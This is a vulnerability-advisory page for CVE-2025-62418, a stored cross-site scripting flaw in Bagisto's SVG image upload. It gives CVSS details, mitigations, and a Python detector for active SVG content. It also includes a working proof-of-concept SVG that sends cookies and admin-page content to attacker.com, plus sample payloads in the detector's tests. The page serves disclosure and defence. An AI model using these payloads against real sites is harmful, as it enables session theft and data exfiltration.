Security Vulnerability Report
CVE-2025-62418 CVSS 6.9 MEDIUM

CVE-2025-62418

Published: 2025-10-16 19:15:35
Last Modified: 2025-10-22 16:55:04

Description

Bagisto is an open source laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted SVG file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser. This vulnerability is fixed in 2.3.8.

CVSS Details

CVSS Score (GitHub advisory, listed by NVD as Secondary)
6.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

CVSS Score (NVD, Primary)
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

The two vectors differ only in confidentiality impact (C:H from the GitHub advisory, C:L from NVD). Both agree on PR:H (the uploader already holds an account with image-upload rights, e.g. admin), UI:R (a victim has to open the uploaded SVG) and S:C (the impact lands in the viewing user's browser rather than in the upload component itself).

Weaknesses
CWE-79 (NVD); CWE-80 and CWE-87 (GitHub advisory)

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:* - VULNERABLE
Bagisto < 2.3.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- CVE-2025-62418 PoC: SVG with embedded JavaScript. -->
<!-- Upload this file through Bagisto's TinyMCE image upload. The script runs -->
<!-- when an admin or storefront user opens the uploaded file's URL in a browser. -->
<!-- The XML declaration must be the first bytes of the file; placing comments before it makes the file malformed XML. -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
  <script type="text/javascript">
    // Exfiltrate the viewer's cookies (only those not marked HttpOnly are readable)
    var img = new Image();
    img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie);
    // Fetch an authenticated admin page with the viewer's session and exfiltrate it
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "/admin/dashboard", true);
    xhr.onreadystatechange = function () {
      if (xhr.readyState == 4) {
        var exfil = new Image();
        exfil.src = "https://attacker.com/exfil?data=" + encodeURIComponent(xhr.responseText);
      }
    };
    xhr.send();
  </script>
  <rect x="0" y="0" width="200" height="200" fill="#ffffff"/>
  <text x="50" y="100" font-family="Arial" font-size="16" fill="#000000">Image</text>
</svg>

Two practical notes on this PoC. Browsers do not execute scripts in an SVG referenced from an <img> tag or a CSS background; the payload only fires when the file is opened as a document (direct navigation to the upload URL, or embedding via <object>, <iframe> or <embed>). Laravel marks its session cookie HttpOnly by default, so the document.cookie exfiltration usually yields little; the XMLHttpRequest to /admin/dashboard is the effective part, because the SVG is served from the application's own origin and the request carries the victim's session automatically. Serving uploads with Content-Disposition: attachment, or with a Content-Security-Policy that forbids script on the upload path, blocks both branches even if a malicious file is already stored.
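The upload-time check that would have stopped this class of file, as an added example that is not Bagisto's code and not the vendor's fix: a scanner that flags the SVG constructs a browser executes when the file is opened as a document (<script>, on* event handlers, javascript:/data: hrefs, <foreignObject> and friends, SMIL animation rewriting href). It also handles the edge case the PoC above shows: a file that a strict XML parser rejects (comments ahead of the XML declaration) but that a browser still renders is flagged and checked with raw byte patterns. The sample inputs are constructed here, modelled on the PoC; function names and the finding strings are this example's own.

```python
"""Detector for active content in uploaded SVG files (added example, not Bagisto code)."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

XLINK_NS = "http://www.w3.org/1999/xlink"

# Elements that carry script or foreign (HTML) content.
DANGEROUS_TAGS = {"script", "foreignObject", "iframe", "embed", "object"}
# SMIL elements that can set href to a javascript: URL after load.
ANIMATION_TAGS = {"set", "animate", "animateMotion", "animateTransform"}
# href attribute keys as ElementTree reports them (plain and xlink-namespaced).
URL_ATTRS = {"href", "{%s}href" % XLINK_NS}
# Fallback patterns for files the XML parser refuses; browsers are more lenient.
RAW_PATTERNS = [
    (re.compile(rb"<\s*script\b", re.I), "script element (raw scan)"),
    (re.compile(rb"\son[a-z]+\s*=", re.I), "event handler attribute (raw scan)"),
    (re.compile(rb"javascript\s*:", re.I), "javascript: URL (raw scan)"),
    (re.compile(rb"<\s*foreignObject\b", re.I), "foreignObject element (raw scan)"),
]


def _local(name: str) -> str:
    """Strip a '{namespace}' prefix from a tag or attribute name."""
    return name.rsplit("}", 1)[-1]


def _scheme(value: str) -> str:
    """Return the lower-cased URL scheme of an attribute value, or ''."""
    value = value.strip().lower()
    return value.split(":", 1)[0] if ":" in value else ""


def scan_svg(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means nothing suspicious.

    xml.etree keeps this stdlib-only; production code parsing untrusted XML
    should use defusedxml to avoid entity-expansion attacks.
    """
    findings: list[str] = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Not well-formed XML: browsers may still render it, so scan raw bytes.
        findings.append(f"not well-formed XML ({exc}); falling back to raw scan")
        findings.extend(label for pat, label in RAW_PATTERNS if pat.search(data))
        return findings

    for elem in root.iter():  # depth-first, document order; comments are dropped by the parser
        name = _local(elem.tag)
        if name in DANGEROUS_TAGS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            short = _local(attr)
            if short.lower().startswith("on"):
                findings.append(f"event handler attribute {short} on <{name}>")
            if attr in URL_ATTRS and _scheme(value) in {"javascript", "data"}:
                findings.append(f"{_scheme(value)}: URL in {short} on <{name}>")
        if name in ANIMATION_TAGS and elem.get("attributeName", "") in {"href", "xlink:href"}:
            findings.append(f"<{name}> rewriting href")
    return findings


def is_safe_svg(data: bytes) -> bool:
    """True when scan_svg reports nothing; usable as an upload-time gate."""
    return not scan_svg(data)


# Constructed samples. POC_SVG mirrors the PoC above, including the comment
# placed before the XML declaration, which a strict XML parser rejects.
POC_SVG = (
    b"<!-- CVE-2025-62418 PoC: SVG with embedded JavaScript -->\n"
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">\n'
    b'<script type="text/javascript">var i=new Image();'
    b'i.src="https://attacker.com/steal?c="+encodeURIComponent(document.cookie);</script>\n'
    b'<rect x="0" y="0" width="200" height="200" fill="#ffffff"/>\n</svg>\n'
)
# Same payload family, but well-formed, so the structural checks run.
WELLFORMED_MALICIOUS_SVG = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"'
    b' onload="alert(1)">\n'
    b'<script type="text/javascript">fetch("/admin/dashboard")</script>\n'
    b'<a xlink:href="javascript:alert(2)"><text>x</text></a>\n</svg>\n'
)
# A plain image with no active content.
BENIGN_SVG = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">\n'
    b'<rect x="0" y="0" width="200" height="200" fill="#ffffff"/>\n'
    b'<text x="50" y="100" font-family="Arial" font-size="16" fill="#000000">Image</text>\n</svg>\n'
)

if __name__ == "__main__":
    for label, sample in [("poc", POC_SVG), ("well-formed", WELLFORMED_MALICIOUS_SVG), ("benign", BENIGN_SVG)]:
        print(label, "->", scan_svg(sample) or "clean")
```

Running the block prints a finding list for the two malicious samples and "clean" for the benign one. The same function can be pointed at an existing uploads directory to triage files that were stored before the upgrade to 2.3.8; a deny-list scanner like this is a detection aid, and the robust upload policy is to reject SVG outright or rasterize it, with the serving-side mitigations noted above as defence in depth.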

References

https://github.com/bagisto/bagisto/security/advisories/GHSA-fg89-g389-p346 (GitHub Security Advisory; tagged Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62418", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:34.803", "lastModified": "2025-10-22T16:55:04.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. In Bagisto v2.3.7, the TinyMCE image upload functionality allows an attacker with sufficient privileges (e.g. admin) to upload a crafted SVG file containing embedded JavaScript. When viewed, the malicious code executes in the context of the admin/user’s browser. This vulnerability is fixed in 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-87"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:*", "matchCriteriaId": 
"991C244A-9DC2-431C-8ABC-BCF3AE81AD09"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-fg89-g389-p346", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-fg89-g389-p346", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}